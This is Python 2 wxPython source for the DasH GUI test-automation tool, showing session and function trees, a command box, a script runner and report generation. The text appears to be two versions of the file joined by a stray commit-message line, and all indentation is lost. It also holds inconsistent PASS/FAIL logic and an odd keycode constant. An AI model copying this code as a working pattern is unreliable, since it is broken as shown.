self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
from wx.aui import AuiNotebook
bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
self.case_suite_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.function_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.session_page = wx.TreeCtrl(self.navigator, wx.ID_ANY, wx.DefaultPosition, wx.Size(-1, -1), wx.TR_DEFAULT_STYLE | wx.TR_EDIT_LABELS | wx.TR_EXTENDED | wx.TR_HAS_BUTTONS | wx.TR_HAS_VARIABLE_ROW_HEIGHT | wx.HSCROLL | wx.TAB_TRAVERSAL | wx.VSCROLL | wx.WANTS_CHARS)
self.navigator.AddPage(self.session_page, 'SESSION')
self.navigator.AddPage(self.function_page, 'FUNCTION')
self.navigator.AddPage(self.case_suite_page, 'CASE')
self.edit_area = AuiNotebook(self.m_file_editor, style = wx.aui.AUI_NB_DEFAULT_STYLE)
self.edit_area.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.on_close_tab_in_edit_area, self.edit_area)
if False:
new_page = FileEditor(self.edit_area, 'a', type= type)
self.edit_area.AddPage(new_page, 'test')
self.tabs_in_edit_area.append(('test'))
self.edit_area.Enable(True)
right_sizer = wx.BoxSizer(wx.VERTICAL)
#right_sizer =wx.GridSizer( 3, 1, 0, 0 )
left_sizer = wx.BoxSizer(wx.HORIZONTAL)
left_sizer.Add(self.m_left_navigator, 1, wx.EXPAND)
self.case_suite_page.Bind(wx.EVT_LEFT_DCLICK, self.m_case_treeOnLeftDClick)
#self.case_suite_page.Bind(wx.EVT_MOUSEWHEEL, self.case_tree_OnMouseWheel)
self.case_suite_page.Bind(wx.EVT_TREE_ITEM_EXPANDING, self.m_case_treeOnTreeItemExpanding)
self.session_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Session_tab)
self.function_page.Bind(wx.EVT_LEFT_DCLICK, self.on_LeftDClick_in_Function_tab)
self.function_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_function_tab)
self.case_suite_page.Bind(wx.EVT_RIGHT_DOWN, self.on_right_down_in_case_tab)
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer = wx.GridSizer( 1, 2, 0, 0 )
nav_sizer = wx.BoxSizer()
nav_sizer.Add(self.navigator, 1, wx.EXPAND, 1)
self.m_left_navigator.SetSizer(nav_sizer)
#main_sizer = wx.BoxSizer(wx.HORIZONTAL)
#main_sizer.Add(left_sizer, 3, wx.EXPAND)
main_sizer.Add(left_sizer, 2, wx.EXPAND)
edit_sizer = wx.BoxSizer()
edit_sizer.Add(self.edit_area, 1, wx.EXPAND, 1)
self.m_file_editor.SetSizer(edit_sizer)
right_sizer.Add(self.m_file_editor, 6, wx.ALL|wx.EXPAND, 1)
right_sizer.Add(self.m_log, 3, wx.ALL|wx.EXPAND, 2)
right_sizer.Add(self.m_command_box, 0, wx.ALL|wx.EXPAND, 3)
main_sizer.Add(right_sizer, 8, wx.EXPAND)
self.SetSizer(main_sizer)
self.build_session_tab()
self.build_suite_tree()
self.build_function_tab()
ico = wx.Icon('./gui/dash.bmp', wx.BITMAP_TYPE_ICO)
self.SetIcon(ico)
def on_close(self, event):
self.generate_code(file_name='{}/test_script.py'.format(self.ini_setting.get('dash', 'log_path')))
self.generate_report(filename='{}/dash_report.txt'.format(self.ini_setting.get('dash', 'log_path')))
for index in range(0,self.edit_area.GetPageCount()): #len(self.tabs_in_edit_area)):
closing_page = self.edit_area.GetPage(index)
if isinstance(closing_page, (SessionTab)):
if closing_page:
name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(name))
closing_page.on_close()
self.redir.close()
sys.stderr =self.redir.old_stderr
sys.stdout = self.redir.old_stdout
event.Skip()
def generate_report(self, filename):
report = '''Test Report
RESULT\tScript Name\n'''
if len(self.running_process):
with open(filename, 'a+') as f:
f.write(report)
for pi in self.running_process:
name, pro= pi[:2]
if pro.returncode is None:
result = 'RUNNING'
else:
result = 'PASS' if pro.returncode else 'FAIL'
pid = pro.pid
record = '\t'.join(['{}'.format(x) for x in [result,name]])
report+=record+'\n'
f.write(record+'\n')
def on_close_tab_in_edit_area(self, event):
#self.edit_area.GetPage(self.edit_area.GetSelection()).on_close()
closing_page = self.edit_area.GetPage(self.edit_area.GetSelection())
closing_page.on_close()
if isinstance(closing_page, (SessionTab)):
ses_name = closing_page.name
self.tabs_in_edit_area.pop(self.tabs_in_edit_area.index(ses_name))
if globals().has_key(ses_name):
#g = dict(globals())
#globals()[ses_name]=None
#del g[ses_name]
globals()[ses_name].close_session()
del globals()[ses_name]
def add_item_to_subfolder_in_tree(self,node):
subfolder_path_name = self.case_suite_page.GetPyData(node)['path_name']
items = get_folder_item(subfolder_path_name)
if items is None:
self.case_suite_page.SetItemText(node, self.m_case_tree.GetItemText(node) + ' Not Exists!!!')
self.case_suite_page.SetItemTextColour(node, wx.Colour(255, 0, 0))
return
for i in items:
path_name = '{}/{}'.format(subfolder_path_name,i)
base_name = os.path.basename(i)
item_info = wx.TreeItemData({'path_name':path_name})
new_item = self.case_suite_page.InsertItem(node, node, base_name)
self.case_suite_page.SetItemData(new_item, item_info)
if os.path.isdir(path_name):
self.case_suite_page.SetItemHasChildren(new_item)
#self.m_case_tree.ItemHasChildren()
#self.m_case_tree.InsertItem(new_item,new_item,'')
def build_suite_tree(self):
suite_path = os.path.abspath(self.ini_setting.get('dash','test_suite_path'))
if not os.path.exists(suite_path):
suite_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(suite_path)
root =self.case_suite_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':suite_path})
self.case_suite_page.SetItemData(root, item_info)
self.add_item_to_subfolder_in_tree(root)
self.case_suite_page.Expand(root)
# def OnSelChanged(self, event):
# item = event.GetItem()
# self.display.SetLabel(self.tree.GetItemText(item))
#def case_tree_OnMouseWheel(self, event):
def m_case_treeOnLeftDClick(self, event):
ht_item =self.case_suite_page.GetSelection()
#ht_item = self.HitTest(event.GetPosition())
item_name = self.case_suite_page.GetItemText(ht_item)
item_data = self.case_suite_page.GetItemData(ht_item)
if self.case_suite_page.ItemHasChildren(ht_item):
if self.case_suite_page.IsExpanded(ht_item):
self.case_suite_page.Collapse(ht_item)
else:
self.case_suite_page.ExpandAllChildren(ht_item)
else:
if item_name.lower() in ['.csv', '.xlsx','.xls']:
type = 'grid'
file_name = item_data.Data['path_name']
else:
type = 'text'
file_name = item_data.Data['path_name']
new_page = FileEditor(self.edit_area, 'a', type= type,file_name=file_name)
self.edit_area.AddPage(new_page, item_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
def m_case_treeOnTreeItemExpanding(self,event):
ht_item =self.case_suite_page.GetSelection()
try:
item_info = self.case_suite_page.GetPyData(ht_item)
if 0== self.case_suite_page.GetChildrenCount(ht_item):
if os.path.isdir(item_info['path_name']):
self.add_item_to_subfolder_in_tree(ht_item)
except Exception as e:
pass
def build_session_tab(self):
if self.session_page.RootItem:
self.session_page.DeleteAllItems()
session_path = os.path.abspath(self.ini_setting.get('dash','session_path'))
self.session_path= session_path
if not os.path.exists(session_path):
session_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(session_path)
sessions = {}
root =self.session_page.AddRoot(base_name)
item_info = wx.TreeItemData({'path_name':session_path})
self.session_page.SetItemData(root, item_info)
self.session_page.Expand(root)
item_list = get_folder_item(session_path)
session_files=[]
for item in item_list:
if os.path.isfile('{}/{}'.format(session_path,item)) and '{}'.format(item).lower().strip().endswith('.csv'):
session_files.append(item)
for csv_file in sorted(session_files):
try:
ses_in_bench = load_bench(os.path.abspath('{}/{}'.format(session_path, csv_file)))
for bench in ses_in_bench:
for ses in ses_in_bench[bench]:
if ses_in_bench[bench][ses].has_key('login_step') and ses_in_bench[bench][ses]['login_step'].strip() not in ['', None]:
ses_in_bench[bench][ses].update(
{'login_step': os.path.abspath('{}/{}'.format(session_path, ses_in_bench[bench][ses]['login_step'].strip()))}
)
sessions.update(ses_in_bench)
except Exception as e:
pass
root =self.session_page.GetRootItem()
for file_name in sorted(sessions.keys()):
item_name = os.path.basename(file_name)
item_info = wx.TreeItemData({'file_name':file_name})
new_bench = self.session_page.InsertItem(root, root, item_name)
self.case_suite_page.SetItemData(new_bench, item_info)
for ses in sorted(sessions[file_name]):
item_name = ses
item_info = wx.TreeItemData({'attribute':sessions[file_name][ses]})
new_item = self.session_page.InsertItem(new_bench, new_bench, item_name)
self.case_suite_page.SetItemData(new_item, item_info)
self.session_page.Expand(root)
first_child = self.session_page.GetFirstChild(root)
self.session_page.Expand(first_child[0])
def on_LeftDClick_in_Session_tab(self, event):
event.Skip()
ses_name = self.session_page.GetItemText(self.session_page.GetSelection())
self.session_page.GetItemText(self.session_page.GetSelection())
session_attribute = self.session_page.GetItemData(self.session_page.GetSelection())
if session_attribute.Data.has_key('attribute'):
info(session_attribute.Data['attribute'])
counter =1
original_ses_name = ses_name
while ses_name in self.tabs_in_edit_area:
ses_name= '{}_{}'.format(original_ses_name,counter)
counter+=1
if globals().has_key(ses_name):
if not globals().has_key('_{}'.format(ses_name)):
info("variable '{}' is existed in global, change the name to _{}".format(ses_name, ses_name))
ses_name='_{}'.format(ses_name)
self.session_page.SetItemText(self.session_page.GetSelection(), ses_name)
else:
error(("variable '{}' is existed in global, please change the name".format(ses_name)))
return
new_page = SessionTab(self.edit_area, ses_name, session_attribute.Data['attribute'], self.sequence_queue, log_path=self.log_path)
window_id = self.edit_area.AddPage(new_page, ses_name)
index = self.edit_area.GetPageIndex(new_page)
self.edit_area.SetSelection(index)
self.tabs_in_edit_area.append(ses_name)
self.sessions_alive.update({ses_name: new_page.name})
attribute = session_attribute.Data['attribute']
log_path='a_fake_log_path_for_auto_script'
attribute['log_path']=log_path
self.add_new_session_to_globals(new_page, '{}'.format(attribute))
#globals().update({ses_name: new_page.session})
def add_new_session_to_globals(self, new_page, args_str):
if globals().has_key(new_page.name):
if globals()[new_page.name]==None:
pass
else:
error('{} already '.format(new_page.name))
else:
globals().update({new_page.name: new_page})
self.add_cmd_to_sequence_queue('{} = dut.dut(name= "{}", **{})'.format(new_page.name,new_page.name,args_str.replace("'a_fake_log_path_for_auto_script'",'log_path').replace("'not_call_open': True,", "'not_call_open': False,") ), 'dut')
#session = dut(name, **attributes)
def on_command_enter(self, event):
info('called on_command_enter')
cmd = self.m_command_box.GetValue()
self.m_command_box.Clear()
if cmd.strip()=='':
return
module,class_name, function,args = parse_command_line(cmd)
#args[0]=self.sessions_alive['test_ssh'].session
if module !='' or class_name!='' or function!='':
instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
call_function = None
if class_name!="":
call_function = getattr(instance_name, function_name)
#(*new_argvs,**new_kwargs)
else:
call_function = instance_name#(*new_argvs,**new_kwargs)
th =threading.Thread(target=call_function, args=new_argvs, kwargs=new_kwargs)
th.start()
self.add_cmd_to_history(cmd, module, str_code)
else:
error('"{}" is NOT a valid call in format:\n\tmodule.class.function call or \n\tmodule.function'.format(cmd))
def add_src_path_to_python_path(self, path):
paths = path.split(';')
old_path = sys.path
for p in paths:
if p in old_path:
info('path {} already in sys.path'.format(p))
else:
abspath = os.path.abspath(p)
if os.path.exists(abspath):
sys.path.insert(0,abspath)
else:
warn('path {} is not existed, ignored to add it into sys.path'.format(p))
def on_key_down(self, event):
#error(event.KeyCode)
keycode = event.KeyCode
if keycode ==wx.WXK_TAB:
self.m_command_box.AppendText('\t')
self.on_command_enter(event)
elif keycode == wx.PAPER_ENV_INVITE and wx.GetKeyState(wx.WXK_SHIFT):
self.m_command_box.AppendText('?')
self.on_command_enter(event)
else:
event.Skip()
def on_key_up(self, event):
keycode = event.KeyCode
increase =False
if keycode ==wx.WXK_UP:
pass
elif keycode ==wx.WXK_DOWN:
increase =True#
if keycode in [wx.WXK_UP, wx.WXK_DOWN]:
self.m_command_box.Clear()
self.history_cmd_index, new_command = get_next_in_ring_list(self.history_cmd_index,self.history_cmd,increase=increase)
self.m_command_box.AppendText(new_command)
if keycode in [wx.WXK_TAB]:
pass
else:
event.Skip()
def add_cmd_to_history(self, cmd, module_name, str_code):
if self.history_cmd==[]:
self.history_cmd.append(cmd)
elif self.history_cmd[-1]==cmd:
pass
else:
self.history_cmd.append(cmd)
self.history_cmd_index= len(self.history_cmd)
self.add_cmd_to_sequence_queue(str_code,module_name )
#self.sequence_queue.put([cmd, datetime.now()])
def build_function_tab(self):
src_path = os.path.abspath(self.src_path)
if not os.path.exists(src_path):
src_path= os.path.abspath(os.path.curdir)
base_name = os.path.basename(src_path)
root =self.function_page.AddRoot(base_name)
item_info = wx.TreeItemData({'name':src_path})
self.function_page.SetItemData(root, item_info)
modules = get_folder_item(src_path)
if modules is None:
self.function_page.SetItemText(root, self.function_page.GetItemText(root) + ' Not Exists!!!')
self.function_page.SetItemTextColour(root, wx.Colour(255, 0, 0))
return
for module_file in modules:
path_name = '{}'.format(os.path.abspath(self.src_path))
module_name = os.path.basename(module_file).split('.')[0]
new_module = self.function_page.InsertItem(root, root, module_name)
file, path_name, description = imp.find_module(module_name)
lmod = imp.load_module(module_name, file, path_name,description)
for attr in sorted(dir(lmod)):
if attr.startswith('__'):
continue
attr_obj = getattr(lmod, attr)
attr_type = type(attr_obj)
if attr_type == types.FunctionType :
new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_item, item_info)
elif attr_type== types.TypeType:
class_obj = getattr(lmod, attr)
new_class = self.function_page.InsertItem(new_module, new_module, attr)
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_item, item_info)
for attr_in_class in sorted(dir(class_obj)):
if attr_in_class.startswith('__'):
continue
attr_obj = getattr(class_obj,attr_in_class)
attr_type =type(attr_obj)
if attr_type == types.MethodType :
item_info = wx.TreeItemData({'name':'{}.{}.{}'.format(module_name,attr,attr_in_class)})
new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
self.function_page.SetItemData(new_item, item_info)
self.function_page.Expand(root)
first_child = self.function_page.GetFirstChild(root)
self.function_page.Expand(first_child[0])
def on_LeftDClick_in_Function_tab(self,event):
event.Skip()
select_item = self.function_page.GetSelection()
fun_name = self.function_page.GetItemData(select_item)
text_in_tree = self.function_page.GetItemText(select_item)
if fun_name != None and fun_name.Data.has_key('name'):
cmd = fun_name.Data['name']
info('click item in Functions tab: {}'.format(fun_name.Data['name']))
wx.CallAfter(self.m_command_box.Clear)
wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
wx.CallAfter(self.m_command_box.SetFocus)
wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
wx.CallAfter(self.m_command_box.Refresh)
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:module_name})
self.sequence_queue.put([cmd,datetime.now() ])
def generate_code(self, file_name ):
str_code ="""#created by DasH
if __name__ == "__main__":
import sys, traceback
sys.path.insert(0,r'{}')
sys.path.insert(0,r'{}')
import lib.common
log_path= '../log/tmp'
log_path= lib.common.create_case_folder()
try:
""".format(self.src_path,self.lib_path )
sessions =[]
for module in self.import_modules:
str_code+=' import {mod}\n'.format(mod=module)#\n {mod}_instance = {mod}()
no_operation = True
while True:
try:
cmd, timestamp =self.sequence_queue.get(block=False)[:2]
str_code +=' {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
if cmd.find('dut.dut(')!=-1:
sessions.append(cmd.split('=')[0].strip())
no_operation=False
#datetime.now().isoformat()
except Exception as e:
break
close_session=''
str_code+=''' except Exception as e:
print(traceback.traceback.format_exc())\n'''
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
str_code+=' sys.exit(-1)\n'#, sys.exit(-1)
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
info(str_code)
if not no_operation:
with open(file_name, 'a+') as f:
f.write(str_code)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.PopupMenu(menu,event.GetPosition())
def on_kill_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
if item_data.has_key('PROCESS'):
p = item_data['PROCESS']
name= item_data['FULL_NAME']
info('script:{}, returncode:{}'.format(name,p.returncode))
if p.returncode is None:
#if p.is_alive():
info('Terminate alive process {}:{}'.format(item_name, p.pid))
p.terminate()
else:
result ='FAIL' if p.returncode else 'PASS'
info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
def on_run_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
import shlex
lex = shlex.shlex(item_name)
lex.quotes = '"'
lex.whitespace_split = True
script_and_args =list(lex)[1:]
item_data = self.case_suite_page.GetItemData(hit_item).Data
script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
from lib.common import run_script
from multiprocessing import Process, Queue
import subprocess
self.on_kill_script(event)
#queue = Queue()
try:
if os.path.exists('script_runner.exe'):
execute = 'script_runner.exe'
cmd = [execute,script_name ]+script_and_args + ['-l','{}'.format(self.log_path)]
#p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
else:
cmd = [sys.executable, script_name ]+script_and_args+ ['-l','{}'.format(self.log_path)]
p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
info('start process {} :{}'.format(item_name, p.pid))
self.running_process.append([item_name, p])
#p.join() # this blocks until the process terminates
time.sleep(1)
except Exception as e :
import traceback
error(traceback.format_exc())
#p = Process(target=run_script, args=[script_name, script_and_args])
#p.start()
def polling_running_cases(self):
for pid in self.dict_test_report:
for case_name in self.dict_test_report[pid]:
start_time, end_time, duration, tmp_return_code ,proc= [case_name]
#todo: polling proc status and fill report
def add_newe_case_to_report(self, pid, case_name, proc):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
if pid in self.dict_test_report:
self.dict_test_report[pid].update({case_name:[start_time,end_time, duration, return_code, proc]})
else:
self.dict_test_report[pid]={case_name:[start_time, end_time, duration,return_code, proc ]}
def update_case_status(self, pid,case_name, return_code=None):
now = datetime.now()
start_time, end_time, duration, tmp_return_code ,proc= self.dict_test_report[pid][case_name]
if return_code is None:
duration = (now-start_time).total_seconds()
self.dict_test_report[pid][case_name]=[start_time, end_time, duration, tmp_return_code, proc]
else:
duration = (now-start_time).total_seconds()
self.dict_test_report[case_name][pid]=[start_time, now, duration, return_code, proc]
#p.terminate()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#todo: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#todo: 2017-08-19 run a script in DasH
#todo: 2017-08-19 generate test report
#todo: 2017-08-19 publish all test cases in a web page
#todo: 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#todo: 2017-08-19 build executable packege for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#todo: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#todo: 2017-08-23 add tips for all tree item in teh left
save auto_code file to suite_path
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
from datetime import datetime
import wx.grid as gridlib
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
#from dut import dut
class RedirectText(object):
font_point_size = 10
old_stdout = None
old_stderr = None
write_lock = None
log_file = None
def __init__(self,aWxTextCtrl, log_path=None):
self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
self.out=aWxTextCtrl
self.font_point_size = self.out.GetFont().PointSize
self.write_lock = threading.Lock()
if log_path:
name = '{}/dash.log'.format(log_path)
self.log_file = open(name, 'w+')
self.fileno = self.log_file.fileno
def write(self,string):
self.write_lock.acquire()
self.old_stdout.write(string)
#string = string.replace('\\033\[[0-9\;]+m', '')
#self.old_stderr.write(string)
if re.search('error|\s+err\s+|fail|wrong',string.lower()):
self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW, font =wx.Font(self.font_point_size+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))#wx.CallAfter(s
else:
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
wx.CallAfter(self.out.AppendText, string)
if self.log_file:
self.log_file.write(string)
self.log_file.flush()
self.write_lock.release()
def close(self):
if self.log_file:
self.log_file.flush()
self.log_file.close()
class process_info(object):
process = None
pid=None
full_name=None
returncode = None
def __init__(self,name, process):
self.process= process
self.pid = process.pid
self.full_name =name
self.returncode = process.returncode
@property
def returncode(self):
return self.process.returncode
class FileEditor(wx.Panel):
editor =None
font_size=10
parent=None
type = None
sessions_node =None
function_node =None
case_suite_node =None
full_file_name = None
file_instance = None
def on_close(self):
if self.full_file_name:
data = self.editor.GetValue()
with open(self.full_file_name, 'w') as f:
f.write(data)
f.flush()
#done 2017-9-12: handle close tab in edit_area
def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
wx.Panel.__init__(self, parent)
self.parent = parent
self.type = type
self.full_file_name = file_name
#self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
if type in ['text']:
self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
#wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
with open(self.full_file_name, 'r') as f:
for line in f.readlines():
self.editor.AppendText(line)
else:
self.editor= gridlib.Grid(self)
self.editor.CreateGrid(50, 5)
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
function_color ='black'
arg_color = 'blue'
for c in range(0, col):
if c < 1 :
self.editor.SetColLabelValue(c, 'Function Name')
else:
self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
for r in range (0, row):
self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
for r in range (0, row):
self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
sizer = wx.BoxSizer()
sizer.Add(self.editor, 1, wx.EXPAND)
self.SetSizer(sizer)
def editor_OnMouseWheel(self,event):
min_font_size = 5
interval_step = 2
if event.ControlDown():
pass
else:
return
if event.GetWheelRotation() < 0:
if self.font_size>min_font_size:
self.font_size-=interval_step
else:
self.font_size+=1
if self.type in ['text']:
f =self.editor.GetFont()
f.PointSize= self.font_size
self.editor.SetFont(f)
else:
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
for c in range(0, col):
for r in range (0, row):
f = self.editor.GetCellFont(r, c)
f.PointSize = self.font_size
self.editor.SetCellFont(r, c, f)
self.Refresh()
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
class DasHFrame(MainFrame):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = None
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':'TC'}
lib_path ='./lib'
log_path = '../log'
session_path = './sessions'
suite_path = '../test_suite'
running_process=None
dict_test_report= None
def __init__(self,parent=None, ini_file = './gDasH.ini'):
#wx.Frame.__init__(self, None, title="DasH")
self.dict_test_report={}
self.running_process = list()
self.tabs_in_edit_area=[]
self.sessions_alive={}
MainFrame.__init__(self, parent=parent)
self.sequence_queue= Queue.Queue()
#self.sequence_queue.put()
self.ini_setting = ConfigParser.ConfigParser()
self.ini_setting.read(ini_file)
self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
self.suite_path = os.path.abspath(self.ini_setting.get('dash', 'test_suite_path'))
from lib.common import create_case_folder, create_dir
sys.argv.append('-l')
sys.argv.append('{}'.format(self.log_path))
self.log_path = create_case_folder(self.log_path)
self.suite_path = create_dir(self.suite_path)
self.lib_path = create_dir(self.lib_path)
self.src_path = create_dir(self.src_path)
if not os.path.exists(self.log_path):
os.mkdir(self.log_path)
self.add_src_path_to_python_path(self.src_path)
self.redir = RedirectText(self.m_log, self.log_path)
sys.stdout = self.redir
sys.stderr = self.redir
self.m_log.SetBackgroundColour('Black')
self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
#self.m_editor.WriteText('welcome to dash world')
self.m_log.WriteText('Welcome to DasH!\n')
self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
fileMenu = wx.Menu()
open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
self.m_menubar_main.Append(fileMenu, "&Open")
self.Bind(wx.EVT_CLOSE, self.on_close)
self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
self.m_command_box.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
from wx.aui import AuiNotebook
bookStyle = wx.aui.AUI_NB_DEFAULT_STYLE &(~wx.aui.AUI_NB_CLOSE_ON_ACTIVE_TAB)
self.navigator = AuiNotebook(self.m_left_navigator, style= bookStyle )
